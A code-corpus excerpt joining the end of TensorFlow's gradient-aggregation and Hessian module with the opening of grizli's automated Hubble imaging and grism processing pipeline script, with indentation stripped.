for i, out_grad in enumerate(out_grads):
if loop_state:
if isinstance(out_grad, (ops.Tensor, ops.IndexedSlices)):
assert control_flow_util.IsLoopSwitch(op)
continue
# Grads have to be Tensors or IndexedSlices
if (isinstance(out_grad, collections.Sequence) and not all([
isinstance(g, (ops.Tensor, ops.IndexedSlices))
for g in out_grad
if g is not None
])):
raise TypeError("gradients have to be either all Tensors "
"or all IndexedSlices")
# Aggregate multiple gradients, and convert [] to None.
if out_grad:
if len(out_grad) < 2:
used = "nop"
out_grads[i] = out_grad[0]
elif all([isinstance(g, ops.Tensor) for g in out_grad if g is not None]):
tensor_shape = _AccumulatorShape(out_grad)
if (aggregation_method == AggregationMethod.EXPERIMENTAL_ACCUMULATE_N
and len(out_grad) > 2 and tensor_shape.is_fully_defined()):
# The benefit of using AccumulateN is that its inputs can be combined
# in any order and this can allow the expression to be evaluated with
# a smaller memory footprint. When used with gpu_allocator_retry,
# it is possible to compute a sum of terms which are much larger than
# total GPU memory.
# AccumulateN can currently only be used if we know the shape for
# an accumulator variable. If this is not known, or if we only have
# 2 grads then we fall through to the "tree" case below.
used = "accumulate_n"
out_grads[i] = math_ops.accumulate_n(out_grad)
elif aggregation_method in [
AggregationMethod.EXPERIMENTAL_TREE,
AggregationMethod.EXPERIMENTAL_ACCUMULATE_N
]:
# Aggregate all gradients by doing pairwise sums: this may
# reduce performance, but it can improve memory because the
# gradients can be released earlier.
#
# TODO(vrv): Consider replacing this with a version of
# tf.AddN() that eagerly frees its inputs as soon as they are
# ready, so the order of this tree does not become a problem.
used = "tree"
with ops.name_scope(op.name + "_gradient_sum"):
running_sum = out_grad[0]
for grad in out_grad[1:]:
running_sum = math_ops.add_n([running_sum, grad])
out_grads[i] = running_sum
else:
used = "add_n"
out_grads[i] = _MultiDeviceAddN(out_grad, gradient_uid)
logging.vlog(2, " _AggregatedGrads %d x %s using %s", len(out_grad),
tensor_shape, used)
else:
out_grads[i] = _AggregateIndexedSlicesGradients(out_grad)
else: # not out_grad
# out_grads[i] is [], thus its aggregation is simply None.
out_grads[i] = None
return out_grads
def _AggregateIndexedSlicesGradients(grads):
"""Aggregates gradients of type `IndexedSlices` by concatenation."""
if len(grads) < 1:
return None
elif len(grads) == 1:
return grads[0]
else:
grads = math_ops._as_indexed_slices_list( # pylint: disable=protected-access
[g for g in grads if g is not None])
grads = [_HandleNestedIndexedSlices(x) for x in grads] # pylint: disable=protected-access
# Form IndexedSlices out of the concatenated values and indices.
concat_grad = ops.IndexedSlices(
array_ops.concat([x.values for x in grads], axis=0),
array_ops.concat([x.indices for x in grads], axis=0),
grads[0].dense_shape)
return concat_grad
# TODO(vrv): Make this available when we want to make it public.
def _hessian_vector_product(ys, xs, v):
"""Multiply the Hessian of `ys` wrt `xs` by `v`.
This is an efficient construction that uses a backprop-like approach
to compute the product between the Hessian and another vector. The
Hessian is usually too large to be explicitly computed or even
represented, but this method allows us to at least multiply by it
for the same big-O cost as backprop.
Implicit Hessian-vector products are the main practical, scalable way
of using second derivatives with neural networks. They allow us to
do things like construct Krylov subspaces and approximate conjugate
gradient descent.
Example: if `y` = 1/2 `x`^T A `x`, then `hessian_vector_product(y,
x, v)` will return an expression that evaluates to the same values
as (A + A.T) `v`.
Args:
ys: A scalar value, or a tensor or list of tensors to be summed to
yield a scalar.
xs: A list of tensors that we should construct the Hessian over.
v: A list of tensors, with the same shapes as xs, that we want to
multiply by the Hessian.
Returns:
A list of tensors (or if the list would be length 1, a single tensor)
containing the product between the Hessian and `v`.
Raises:
ValueError: `xs` and `v` have different length.
"""
# Validate the input
length = len(xs)
if len(v) != length:
raise ValueError("xs and v must have the same length.")
# First backprop
grads = gradients(ys, xs)
assert len(grads) == length
elemwise_products = [
math_ops.multiply(grad_elem, array_ops.stop_gradient(v_elem))
for grad_elem, v_elem in zip(grads, v)
if grad_elem is not None
]
# Second backprop
return gradients(elemwise_products, xs)
@tf_export("hessians")
def hessians(ys,
xs,
name="hessians",
colocate_gradients_with_ops=False,
gate_gradients=False,
aggregation_method=None):
"""Constructs the Hessian of sum of `ys` with respect to `x` in `xs`.
`hessians()` adds ops to the graph to output the Hessian matrix of `ys`
with respect to `xs`. It returns a list of `Tensor` of length `len(xs)`
where each tensor is the Hessian of `sum(ys)`.
The Hessian is a matrix of second-order partial derivatives of a scalar
tensor (see https://en.wikipedia.org/wiki/Hessian_matrix for more details).
Args:
ys: A `Tensor` or list of tensors to be differentiated.
xs: A `Tensor` or list of tensors to be used for differentiation.
name: Optional name to use for grouping all the gradient ops together.
defaults to 'hessians'.
colocate_gradients_with_ops: See `gradients()` documentation for details.
gate_gradients: See `gradients()` documentation for details.
aggregation_method: See `gradients()` documentation for details.
Returns:
A list of Hessian matrices of `sum(ys)` for each `x` in `xs`.
Raises:
LookupError: if one of the operations between `xs` and `ys` does not
have a registered gradient function.
"""
xs = _AsList(xs)
kwargs = {
"colocate_gradients_with_ops": colocate_gradients_with_ops,
"gate_gradients": gate_gradients,
"aggregation_method": aggregation_method
}
# Compute first-order derivatives and iterate for each x in xs.
hessians = []
_gradients = gradients(ys, xs, **kwargs)
for gradient, x in zip(_gradients, xs):
# change shape to one-dimension without graph branching
gradient = array_ops.reshape(gradient, [-1])
# Declare an iterator and tensor array loop variables for the gradients.
n = array_ops.size(x)
loop_vars = [
array_ops.constant(0, dtypes.int32),
tensor_array_ops.TensorArray(x.dtype, n)
]
# Iterate over all elements of the gradient and compute second order
# derivatives.
_, hessian = control_flow_ops.while_loop(
lambda j, _: j < n,
lambda j, result: (j + 1,
result.write(j, gradients(gradient[j], x)[0])),
loop_vars
)
_shape = array_ops.shape(x)
_reshaped_hessian = array_ops.reshape(hessian.stack(),
array_ops.concat((_shape, _shape), 0))
hessians.append(_reshaped_hessian)
return hessians
|
drpngx/tensorflow
|
tensorflow/python/ops/gradients_impl.py
|
Python
|
apache-2.0
| 47,933
|
[
"VisIt"
] |
87795aa178bea7f82bc21dc7cf45b0d7b5c3132337b8c866d179c0bf14cd3da4
|
"""
Automatic processing scripts for grizli
"""
import os
import inspect
import traceback
import glob
import time
import warnings
import numpy as np
import astropy.io.fits as pyfits
import astropy.wcs as pywcs
from .. import prep, utils
from .default_params import UV_N_FILTERS, UV_M_FILTERS, UV_W_FILTERS
from .default_params import OPT_N_FILTERS, OPT_M_FILTERS, OPT_W_FILTERS
from .default_params import IR_N_FILTERS, IR_M_FILTERS, IR_W_FILTERS
from .default_params import ALL_IMAGING_FILTERS, VALID_FILTERS
from .default_params import UV_GRISMS, OPT_GRISMS, IR_GRISMS, GRIS_REF_FILTERS
from .default_params import get_yml_parameters, write_params_to_yml
# needed for function definitions
args = get_yml_parameters()
if False:
np.seterr(divide='ignore', invalid='ignore', over='ignore', under='ignore')
# Only fetch F814W optical data for now
#ONLY_F814W = True
ONLY_F814W = False
def get_extra_data(root='j114936+222414', HOME_PATH='/Volumes/Pegasus/Grizli/Automatic', PERSIST_PATH=None, instruments=['WFC3'], filters=['F160W', 'F140W', 'F098M', 'F105W'], radius=2, run_fetch=True, from_mast=True, reprocess_parallel=True, s3_sync=False):
import os
import glob
import numpy as np
from hsaquery import query, fetch, fetch_mast
from hsaquery.fetch import DEFAULT_PRODUCTS
if PERSIST_PATH is None:
PERSIST_PATH = os.path.join(HOME_PATH, root, 'Persistence')
tab = utils.GTable.gread(os.path.join(HOME_PATH,
f'{root}_footprint.fits'))
# Fix CLEAR filter names
for i, filt_i in enumerate(tab['filter']):
if 'clear' in filt_i.lower():
spl = filt_i.lower().split(';')
if len(spl) > 1:
for s in spl:
if 'clear' not in s:
#print(filt_i, s)
filt_i = s.upper()
break
tab['filter'][i] = filt_i.upper()
ra, dec = tab.meta['RA'], tab.meta['DEC']
fp = np.load(os.path.join(HOME_PATH, '{0}_footprint.npy'.format(root)),
allow_pickle=True)[0]
radius = np.sqrt(fp.area*np.cos(dec/180*np.pi))*60/np.pi
xy = np.array(fp.boundary.convex_hull.boundary.xy)
dims = np.array([(xy[0].max()-xy[0].min())*np.cos(dec/180*np.pi),
xy[1].max()-xy[1].min()])*60
extra = query.run_query(box=[ra, dec, radius],
proposid=[],
instruments=instruments,
extensions=['FLT'],
filters=filters,
extra=query.DEFAULT_EXTRA)
# Fix CLEAR filter names
for i, filt_i in enumerate(extra['filter']):
if 'clear' in filt_i.lower():
spl = filt_i.lower().split(';')
if len(spl) > 1:
for s in spl:
if 'clear' not in s:
#print(filt_i, s)
filt_i = s.upper()
break
extra['filter'][i] = filt_i.upper()
for k in tab.meta:
extra.meta[k] = tab.meta[k]
extra.write(os.path.join(HOME_PATH, root, 'extra_data.fits'),
format='fits', overwrite=True)
CWD = os.getcwd()
os.chdir(os.path.join(HOME_PATH, root, 'RAW'))
if run_fetch:
if from_mast:
out = fetch_mast.get_from_MAST(extra,
inst_products=DEFAULT_PRODUCTS,
direct=True,
path=os.path.join(HOME_PATH, root, 'RAW'),
skip_existing=True)
else:
curl = fetch.make_curl_script(extra,
level=None,
script_name='extra.sh',
inst_products={'WFC3/UVIS': ['FLC'],
'WFPC2/PC': ['C0M', 'C1M'],
'WFC3/IR': ['RAW'],
'ACS/WFC': ['FLC']},
skip_existing=True,
output_path=os.path.join(HOME_PATH, root, 'RAW'),
s3_sync=s3_sync)
os.system('sh extra.sh')
files = glob.glob('*raw.fits.gz')
files.extend(glob.glob('*fl?.fits.gz'))
for file in files:
print('gunzip '+file)
os.system('gunzip {0}'.format(file))
else:
return extra
remove_bad_expflag(field_root=root, HOME_PATH=HOME_PATH, min_bad=2)
# Reprocess the RAWs into FLTs
status = os.system("python -c 'from grizli.pipeline import reprocess; reprocess.reprocess_wfc3ir(parallel={0})'".format(reprocess_parallel))
if status != 0:
from grizli.pipeline import reprocess
reprocess.reprocess_wfc3ir(parallel=False)
# Persistence products
os.chdir(PERSIST_PATH)
persist_files = fetch.persistence_products(extra)
for file in persist_files:
if not os.path.exists(os.path.basename(file)):
print(file)
os.system('curl -O {0}'.format(file))
for file in persist_files:
root = os.path.basename(file).split('.tar.gz')[0]
if os.path.exists(root):
print('Skip', root)
continue
if not os.path.exists(file):
print('Persistence tar file {0} not found'.format(file))
continue
# Ugly callout to shell
os.system('tar xzvf {0}.tar.gz'.format(root))
# Clean unneeded files
clean_files = glob.glob('{0}/*extper.fits'.format(root))
clean_files += glob.glob('{0}/*flt_cor.fits'.format(root))
for f in clean_files:
os.remove(f)
# Symlink to ./
pfiles = glob.glob('{0}/*persist.fits'.format(root))
if len(pfiles) > 0:
for f in pfiles:
if not os.path.exists(os.path.basename(f)):
os.system('ln -sf {0} ./'.format(f))
os.chdir(CWD)
def create_path_dict(root='j142724+334246', home='$PWD', raw=None, prep=None, extract=None, persist=None, thumbs=None, paths={}):
"""
Generate path dict.
Default:
{home}
{home}/{root}
{home}/{root}/RAW
{home}/{root}/Prep
{home}/{root}/Persistence
{home}/{root}/Extractions
{home}/{root}/Thumbnails
If ``home`` specified as '$PWD', then will be calculated from
`os.getcwd`.
Only generates values for keys not already specified in `paths`.
"""
import copy
if home == '$PWD':
home = os.getcwd()
base = os.path.join(home, root)
if raw is None:
raw = os.path.join(home, root, 'RAW')
if prep is None:
prep = os.path.join(home, root, 'Prep')
if persist is None:
persist = os.path.join(home, root, 'Persistence')
if extract is None:
extract = os.path.join(home, root, 'Extractions')
if thumbs is None:
thumbs = os.path.join(home, root, 'Thumbnaails')
xpaths = copy.deepcopy(paths)
for k in xpaths:
if xpaths[k] is None:
_ = xpaths.pop(k)
if 'home' not in xpaths:
xpaths['home'] = home
if 'base' not in xpaths:
xpaths['base'] = base
if 'raw' not in xpaths:
xpaths['raw'] = raw
if 'prep' not in xpaths:
xpaths['prep'] = prep
if 'persist' not in xpaths:
xpaths['persist'] = persist
if 'extract' not in xpaths:
xpaths['extract'] = extract
if 'thumbs' not in xpaths:
xpaths['thumbs'] = extract
return xpaths
def go(root='j010311+131615',
HOME_PATH='$PWD',
RAW_PATH=None, PREP_PATH=None, PERSIST_PATH=None, EXTRACT_PATH=None,
filters=args['filters'],
fetch_files_args=args['fetch_files_args'],
inspect_ramps=False,
is_dash=False, run_prepare_dash=True,
run_parse_visits=True,
is_parallel_field=False,
parse_visits_args=args['parse_visits_args'],
manual_alignment=False,
manual_alignment_args=args['manual_alignment_args'],
preprocess_args=args['preprocess_args'],
visit_prep_args=args['visit_prep_args'],
persistence_args=args['persistence_args'],
redo_persistence_mask=False,
run_fine_alignment=True,
fine_backup=True,
fine_alignment_args=args['fine_alignment_args'],
make_mosaics=True,
mosaic_args=args['mosaic_args'],
mosaic_drizzle_args=args['mosaic_drizzle_args'],
mask_spikes=False,
mosaic_driz_cr_type=0,
make_phot=True,
multiband_catalog_args=args['multiband_catalog_args'],
only_preprocess=False,
overwrite_fit_params=False,
grism_prep_args=args['grism_prep_args'],
refine_with_fits=True,
run_extractions=False,
include_photometry_in_fit=False,
extract_args=args['extract_args'],
make_thumbnails=True,
thumbnail_args=args['thumbnail_args'],
make_final_report=True,
get_dict=False,
kill='',
**kwargs
):
"""
Run the full pipeline for a given target
Parameters
----------
root : str
Rootname of the `mastquery` file.
extract_maglim : [min, max]
Magnitude limits of objects to extract and fit.
"""
# Function defaults
if get_dict:
if get_dict <= 2:
# Default function arguments (different value to avoid recursion)
default_args = go(get_dict=10)
frame = inspect.currentframe()
args = inspect.getargvalues(frame).locals
for k in ['root', 'HOME_PATH', 'frame', 'get_dict']:
if k in args:
args.pop(k)
if get_dict == 2:
# Print keywords summary
if len(kwargs) > 0:
print('\n*** Extra args ***\n')
for k in kwargs:
if k not in default_args:
print('\'{0}\':{1},'.format(k, kwargs[k]))
print('\n*** User args ***\n')
for k in args:
if k in default_args:
if args[k] != default_args[k]:
print('\'{0}\':{1},'.format(k, args[k]))
print('\n*** Default args ***\n')
for k in args:
if k in default_args:
print('\'{0}\':{1},'.format(k, args[k]))
return args
else:
return args
# import os
# import glob
# import traceback
#
#
try:
from .. import multifit
from . import auto_script
except:
from grizli import multifit
from grizli.pipeline import auto_script
# #import grizli.utils
import matplotlib.pyplot as plt
# Silence numpy and astropy warnings
utils.set_warnings()
PATHS = create_path_dict(root=root, home=HOME_PATH,
raw=RAW_PATH, prep=PREP_PATH,
persist=PERSIST_PATH, extract=EXTRACT_PATH)
fpfile = os.path.join(PATHS['home'], '{0}_footprint.fits'.format(root))
exptab = utils.GTable.gread(fpfile)
# Fix CLEAR filter names
for i, filt_i in enumerate(exptab['filter']):
if 'clear' in filt_i.lower():
spl = filt_i.lower().split(';')
if len(spl) > 1:
for s in spl:
if 'clear' not in s:
#print(filt_i, s)
filt_i = s.upper()
break
exptab['filter'][i] = filt_i.upper()
utils.LOGFILE = os.path.join(PATHS['home'], f'{root}.auto_script.log.txt')
utils.log_comment(utils.LOGFILE, '### Pipeline start', show_date=True)
######################
# Download data
os.chdir(PATHS['home'])
if fetch_files_args is not None:
fetch_files_args['reprocess_clean_darks'] &= (not is_dash)
auto_script.fetch_files(field_root=root, HOME_PATH=HOME_PATH,
paths=PATHS,
filters=filters, **fetch_files_args)
else:
os.chdir(PATHS['prep'])
if is_dash & run_prepare_dash:
from wfc3dash import process_raw
os.chdir(PATHS['raw'])
process_raw.run_all()
files = glob.glob(os.path.join(PATHS['raw'], '*_fl*fits'))
files += glob.glob(os.path.join(PATHS['raw'], '*_c[01]m.fits'))
if len(files) == 0:
print('No FL[TC] files found!')
utils.LOGFILE = '/tmp/grizli.log'
return False
if kill == 'fetch_files':
print('kill=\'fetch_files\'')
return True
if inspect_ramps:
# Inspect for CR trails
os.chdir(PATHS['raw'])
status = os.system("python -c 'from grizli.pipeline.reprocess import inspect; inspect()'")
######################
# Parse visit associations
os.chdir(PATHS['prep'])
if (not os.path.exists(f'{root}_visits.npy')) | run_parse_visits:
# Parsing for parallel fields, where time-adjacent exposures
# may have different visit IDs and should be combined
if 'combine_same_pa' in parse_visits_args:
if (parse_visits_args['combine_same_pa'] == -1):
if is_parallel_field:
parse_visits_args['combine_same_pa'] = True
parse_visits_args['max_dt'] = 4./24
else:
parse_visits_args['combine_same_pa'] = False
parse_visits_args['max_dt'] = 1.
else:
parse_visits_args['combine_same_pa'] = is_parallel_field
parsed = auto_script.parse_visits(field_root=root,
RAW_PATH=PATHS['raw'],
filters=filters, is_dash=is_dash,
**parse_visits_args)
else:
parsed = np.load(f'{root}_visits.npy', allow_pickle=True)
if kill == 'parse_visits':
print('kill=\'parse_visits\'')
return True
visits, all_groups, info = parsed
run_has_grism = utils.column_string_operation(info['FILTER'],
['G141', 'G102', 'G800L'],
'count', 'or').sum()
# Alignment catalogs
#catalogs = ['PS1','SDSS','GAIA','WISE']
#######################
# Manual alignment
if manual_alignment:
os.chdir(PATHS['prep'])
auto_script.manual_alignment(field_root=root, HOME_PATH=PATHS['home'],
**manual_alignment_args)
if kill == 'manual_alignment':
print('kill=\'manual_alignment\'')
return True
#####################
# Alignment & mosaics
os.chdir(PATHS['prep'])
tweak_max_dist = (5 if is_parallel_field else 1)
if 'tweak_max_dist' not in visit_prep_args:
visit_prep_args['tweak_max_dist'] = tweak_max_dist
if 'use_self_catalog' not in visit_prep_args:
visit_prep_args['use_self_catalog'] = is_parallel_field
auto_script.preprocess(field_root=root, HOME_PATH=PATHS['home'],
PERSIST_PATH=PATHS['persist'],
visit_prep_args=visit_prep_args,
persistence_args=persistence_args,
**preprocess_args)
if kill == 'preprocess':
print('kill=\'preprocess\'')
print(f'Update exposure footprints in {root}_visits.npy')
get_visit_exposure_footprints(visit_file=f'{root}_visits.npy',
check_paths=['./', PATHS['raw'],
'../RAW'])
return True
if redo_persistence_mask:
comment = '# Redo persistence masking: {0}'.format(persistence_args)
print(comment)
utils.log_comment(utils.LOGFILE, comment)
all_flt_files = glob.glob('*_flt.fits')
all_flt_files.sort()
for file in all_flt_files:
print(file)
pfile = os.path.join(PATHS['persist'],
file.replace('_flt', '_persist'))
if os.path.exists(pfile):
prep.apply_persistence_mask(file, path=PATHS['persist'],
**persistence_args)
##########
# Fine alignment
fine_files = glob.glob('{0}*fine.png'.format(root))
if (run_fine_alignment == 2) & (len(fine_files) > 0) & (len(visits) > 1):
msg = '\n\n### Redo visit-level mosaics and catalogs for fine alignment\n\n'
utils.log_comment(utils.LOGFILE, msg, show_date=True, verbose=True)
keep_visits = []
for visit in visits:
visit_files = glob.glob(visit['product']+'*.cat.*')
visit_files += glob.glob(visit['product']+'_dr*')
visit_files += glob.glob(visit['product']+'*seg.fits*')
if len(visit_files) > 0:
keep_visits.append(visit)
for file in visit_files:
os.remove(file)
# Redrizzle visit-level mosaics and remake catalogs
prep.drizzle_overlaps(keep_visits, check_overlaps=False, skysub=False,
static=False, pixfrac=0.5, scale=None,
final_wcs=False, fetch_flats=False,
final_rot=None,
include_saturated=True)
# Make new catalogs
for visit in keep_visits:
if len(visit['files']) == 0:
continue
visit_filter = visit['product'].split('-')[-1]
is_single = len(visit['files']) == 1
isACS = '_flc' in visit['files'][0]
isWFPC2 = '_c0' in visit['files'][0]
if visit_filter in ['g102', 'g141', 'g800l', 'g280']:
print('# Skip grism visit: {0}'.format(visit['product']))
continue
# New catalog
if visit_prep_args['align_thresh'] is None:
thresh = 2.5
else:
thresh = visit_prep_args['align_thresh']
cat = prep.make_SEP_catalog(root=visit['product'],
threshold=thresh)
# New region file
prep.table_to_regions(cat, '{0}.cat.reg'.format(visit['product']))
# New radec
if not ((isACS | isWFPC2) & is_single):
# 140 brightest or mag range
clip = (cat['MAG_AUTO'] > 18) & (cat['MAG_AUTO'] < 23)
clip &= cat['MAGERR_AUTO'] < 0.05
clip &= utils.catalog_mask(cat,
max_err_percentile=visit_prep_args['max_err_percentile'],
pad=visit_prep_args['catalog_mask_pad'],
pad_is_absolute=False, min_flux_radius=1.)
NMAX = 140
so = np.argsort(cat['MAG_AUTO'][clip])
if clip.sum() > NMAX:
so = so[:NMAX]
prep.table_to_radec(cat[clip][so],
'{0}.cat.radec'.format(visit['product']))
for file in fine_files:
print('rm {0}'.format(file))
os.remove(file)
fine_files = []
if (len(fine_files) == 0) & (run_fine_alignment > 0) & (len(visits) > 1):
fine_catalogs = ['GAIA', 'PS1', 'DES', 'SDSS', 'WISE']
try:
out = auto_script.fine_alignment(field_root=root,
HOME_PATH=PATHS['home'],
**fine_alignment_args)
plt.close()
# Update WCS headers with fine alignment
auto_script.update_wcs_headers_with_fine(root, backup=fine_backup)
except:
utils.log_exception(utils.LOGFILE, traceback)
utils.log_comment(utils.LOGFILE, "# !! Fine alignment failed")
# Update the visits file with the new exposure footprints
print('Update exposure footprints in {0}_visits.npy'.format(root))
get_visit_exposure_footprints(visit_file='{0}_visits.npy'.format(root),
check_paths=['./', PATHS['raw'], '../RAW'])
# Make combined mosaics
no_mosaics_found = len(glob.glob(f'{root}-ir_dr?_sci.fits')) == 0
if no_mosaics_found & make_mosaics:
skip_single = preprocess_args['skip_single_optical_visits']
if 'fix_stars' in visit_prep_args:
fix_stars = visit_prep_args['fix_stars']
else:
fix_stars = False
# For running at the command line
# if False:
# mos_args = {'mosaic_args': kwargs['mosaic_args'],
# 'fix_stars': kwargs['visit_prep_args']['fix_stars'],
# 'mask_spikes': kwargs['mask_spikes'], 'skip_single_optical_visits': kwargs['preprocess_args']['skip_single_optical_visits']}
# auto_script.make_combined_mosaics(root, **mos_args)
make_combined_mosaics(root, mosaic_args=mosaic_args,
fix_stars=fix_stars, mask_spikes=mask_spikes,
skip_single_optical_visits=skip_single,
mosaic_driz_cr_type=mosaic_driz_cr_type,
mosaic_drizzle_args=mosaic_drizzle_args)
# Make PSFs. Always set get_line_maps=False since PSFs now
# provided for each object.
mosaic_files = glob.glob('{0}-f*sci.fits'.format(root))
if (not is_dash) & (len(mosaic_files) > 0):
print('Make field PSFs')
auto_script.field_psf(root=root, PREP_PATH=PATHS['prep'],
RAW_PATH=PATHS['raw'],
EXTRACT_PATH=PATHS['extract'],
get_line_maps=False, skip=False)
# Are there full-field mosaics?
mosaic_files = glob.glob(f'{root}-f*sci.fits')
# Photometric catalog
has_phot_file = os.path.exists(f'{root}_phot.fits')
if (not has_phot_file) & make_phot & (len(mosaic_files) > 0):
try:
tab = auto_script.multiband_catalog(field_root=root,
**multiband_catalog_args)
try:
# Add columns indicating objects that fall in grism exposures
phot = utils.read_catalog(f'{root}_phot.fits')
out = count_grism_exposures(phot, all_groups,
grisms=['g800l', 'g102', 'g141'],
verbose=True)
phot.write(f'{root}_phot.fits', overwrite=True)
except:
pass
except:
utils.log_exception(utils.LOGFILE, traceback)
utils.log_comment(utils.LOGFILE,
'# Run `multiband_catalog` with `detection_background=True`')
multiband_catalog_args['detection_background'] = True
tab = auto_script.multiband_catalog(field_root=root,
**multiband_catalog_args)
#tab = auto_script.multiband_catalog(field_root=root, threshold=threshold, detection_background=True, photometry_background=True, get_all_filters=False)
# Make exposure json / html report
auto_script.exposure_report(root, log=True)
# Stop if only want to run pre-processing
if (only_preprocess | (len(all_groups) == 0)):
if make_thumbnails:
print('#####\n# Make RGB thumbnails\n#####')
if thumbnail_args['drizzler_args'] is None:
thumbnail_args['drizzler_args'] = DRIZZLER_ARGS.copy()
os.chdir(PATHS['prep'])
#print('XXX ', thumbnail_args)
auto_script.make_rgb_thumbnails(root=root, **thumbnail_args)
if not os.path.exists(PATHS['thumbs']):
os.mkdir(PATHS['thumbs'])
os.system('mv {0}_[0-9]*.png {0}_[0-9]*.fits {1}'.format(root,
PATHS['thumbs']))
if make_final_report:
make_report(root, make_rgb=True)
utils.LOGFILE = '/tmp/grizli.log'
return True
######################
# Grism prep
files = glob.glob(os.path.join(PATHS['prep'], '*GrismFLT.fits'))
files += glob.glob(os.path.join(PATHS['extract'], '*GrismFLT.fits'))
if len(files) == 0:
os.chdir(PATHS['prep'])
grp = auto_script.grism_prep(field_root=root, PREP_PATH=PATHS['prep'],
EXTRACT_PATH=PATHS['extract'],
**grism_prep_args)
del(grp)
######################
# Grism extractions
os.chdir(PATHS['extract'])
#####################
# Update the contam model with the "full.fits"
# files in the working directory
if (len(glob.glob('*full.fits')) > 0) & (refine_with_fits):
auto_script.refine_model_with_fits(field_root=root, clean=True,
grp=None, master_files=None,
spectrum='continuum', max_chinu=5)
# Drizzled grp objects
# All files
if len(glob.glob(f'{root}*_grism*fits*')) == 0:
grism_files = glob.glob('*GrismFLT.fits')
grism_files.sort()
catalog = glob.glob(f'{root}-*.cat.fits')[0]
try:
seg_file = glob.glob(f'{root}-*_seg.fits')[0]
except:
seg_file = None
grp = multifit.GroupFLT(grism_files=grism_files, direct_files=[],
ref_file=None, seg_file=seg_file,
catalog=catalog, cpu_count=-1, sci_extn=1,
pad=256)
# Make drizzle model images
grp.drizzle_grism_models(root=root, kernel='point', scale=0.15)
# Free grp object
del(grp)
if is_parallel_field:
pline = auto_script.PARALLEL_PLINE.copy()
else:
pline = auto_script.DITHERED_PLINE.copy()
# Make script for parallel processing
args_file = f'{root}_fit_args.npy'
if (not os.path.exists(args_file)) | (overwrite_fit_params):
msg = '# generate_fit_params: ' + args_file
utils.log_comment(utils.LOGFILE, msg, verbose=True, show_date=True)
pline['pixscale'] = mosaic_args['wcs_params']['pixel_scale']
pline['pixfrac'] = mosaic_args['mosaic_pixfrac']
if pline['pixfrac'] > 0:
pline['kernel'] = 'square'
else:
pline['kernel'] = 'point'
has_g800l = utils.column_string_operation(info['FILTER'], ['G800L'],
'count', 'or').sum()
if has_g800l > 0:
min_sens = 0.
fit_trace_shift = True
else:
min_sens = 0.001
fit_trace_shift = True
try:
auto_script.generate_fit_params(field_root=root, prior=None, MW_EBV=exptab.meta['MW_EBV'], pline=pline, fit_only_beams=True, run_fit=True, poly_order=7, fsps=True, min_sens=min_sens, sys_err=0.03, fcontam=0.2, zr=[0.05, 3.4], save_file=args_file, fit_trace_shift=fit_trace_shift, include_photometry=True, use_phot_obj=include_photometry_in_fit)
except:
# include_photometry failed?
auto_script.generate_fit_params(field_root=root, prior=None, MW_EBV=exptab.meta['MW_EBV'], pline=pline, fit_only_beams=True, run_fit=True, poly_order=7, fsps=True, min_sens=min_sens, sys_err=0.03, fcontam=0.2, zr=[0.05, 3.4], save_file=args_file, fit_trace_shift=fit_trace_shift, include_photometry=False, use_phot_obj=False)
# Copy for now
os.system(f'cp {args_file} fit_args.npy')
# Done?
if (not run_extractions) | (run_has_grism == 0):
# Make RGB thumbnails
if make_thumbnails:
print('#####\n# Make RGB thumbnails\n#####')
if thumbnail_args['drizzler_args'] is None:
thumbnail_args['drizzler_args'] = DRIZZLER_ARGS.copy()
os.chdir(PATHS['prep'])
auto_script.make_rgb_thumbnails(root=root, **thumbnail_args)
if not os.path.exists(PATHS['thumbs']):
os.mkdir(PATHS['thumbs'])
os.system('mv {0}_[0-9]*.png {0}_[0-9]*.fits {1}'.format(root,
PATHS['thumbs']))
utils.LOGFILE = '/tmp/grizli.log'
return True
# Run extractions (and fits)
auto_script.extract(field_root=root, **extract_args)
# Make RGB thumbnails
if make_thumbnails:
print('#####\n# Make RGB thumbnails\n#####')
if thumbnail_args['drizzler_args'] is None:
thumbnail_args['drizzler_args'] = DRIZZLER_ARGS.copy()
os.chdir(PATHS['prep'])
auto_script.make_rgb_thumbnails(root=root, **thumbnail_args)
if not os.path.exists(PATHS['thumbs']):
os.mkdir(PATHS['thumbs'])
os.system('mv {0}_[0-9]*.png {0}_[0-9]*.fits {1}'.format(root,
PATHS['thumbs']))
if extract_args['run_fit']:
os.chdir(PATHS['extract'])
# Redrizzle grism models
grism_files = glob.glob('*GrismFLT.fits')
grism_files.sort()
seg_file = glob.glob(f'{root}-[fi]*_seg.fits')[0]
#catalog = glob.glob(f'{root}-*.cat.fits')[0]
catalog = seg_file.replace('_seg.fits','.cat.fits')
grp = multifit.GroupFLT(grism_files=grism_files, direct_files=[],
ref_file=None, seg_file=seg_file,
catalog=catalog, cpu_count=-1, sci_extn=1,
pad=256)
# Make drizzle model images
grp.drizzle_grism_models(root=root, kernel='point', scale=0.15)
# Free grp object
del(grp)
######################
# Summary catalog & webpage
auto_script.summary_catalog(field_root=root, dzbin=0.01,
use_localhost=False,
filter_bandpasses=None)
if make_final_report:
make_report(root, make_rgb=True)
def make_directories(root='j142724+334246', HOME_PATH='$PWD', paths={}):
"""
Make RAW, Prep, Persistence, Extractions directories
"""
import os
paths = create_path_dict(root=root, home=HOME_PATH, paths=paths)
for k in paths:
if k in ['thumbs']:
continue
dir = paths[k]
if not os.path.exists(dir):
print(f'mkdir {dir}')
os.mkdir(dir)
os.system(f'chmod ugoa+rwx {dir}')
else:
print(f'directory {dir} exists')
return paths
def fetch_files(field_root='j142724+334246', HOME_PATH='$PWD', paths={}, inst_products={'WFPC2/WFC': ['C0M', 'C1M'], 'WFPC2/PC': ['C0M', 'C1M'], 'ACS/WFC': ['FLC'], 'WFC3/IR': ['RAW'], 'WFC3/UVIS': ['FLC']}, remove_bad=True, reprocess_parallel=False, reprocess_clean_darks=True, s3_sync=False, fetch_flt_calibs=['IDCTAB', 'PFLTFILE', 'NPOLFILE'], filters=VALID_FILTERS, min_bad_expflag=2, fetch_only=False):
"""
Fully automatic script
"""
import os
import glob
try:
from .. import utils
frame = inspect.currentframe()
utils.log_function_arguments(utils.LOGFILE, frame,
'auto_script.fetch_files')
except:
from grizli import utils
try:
try:
from mastquery import query, fetch
MAST_QUERY = True
instdet_key = 'instrument_name'
except:
from hsaquery import query, fetch
MAST_QUERY = False
instdet_key = 'instdet'
except ImportError as ERR:
warn = """{0}
Get one of the query scripts from
https://github.com/gbrammer/esa-hsaquery
https://github.com/gbrammer/mastquery
""".format(ERR)
raise(ImportError(warn))
paths = create_path_dict(root=field_root, home=HOME_PATH, paths=paths)
print('paths: ', paths)
if not os.path.exists(paths['raw']):
